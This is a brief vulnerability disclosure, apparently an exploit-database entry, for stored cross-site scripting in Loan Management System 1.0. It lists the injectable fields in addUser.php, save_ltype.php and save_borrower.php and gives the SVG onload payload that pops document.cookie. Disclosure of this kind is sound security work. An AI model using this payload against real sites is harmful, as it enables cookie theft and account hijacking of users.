Loan Management System version 1.0 suffers from a persistent cross site scripting vulnerability.
0e8f410ee7c0e0ebb79866fa6e7831932c94c07784f5823be2d5b028778e2249
# Exploit Title: Loan Management System - XSS Stored
# Date: 28/07/2022
# Exploit Author: saitamang
# Vendor Homepage: sourcecodester
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/razormist/LMS.zip
# Version: 1.0
# Tested on: Centos 7 apache2 + MySQL
There are several functions and parameter affected as below:
addUser.php
- firstname
- lastname
save_ltype.php
- ltype_name
- ltype_desc
save_borrower.php
- firstname
- middlename
- lastname
- address
The payload use to inject is --> "/><svg/onload=alert(document.cookie)>
Reference -
https://github.com/saitamang/POC-DUMP/tree/main/Loan%20Management%20System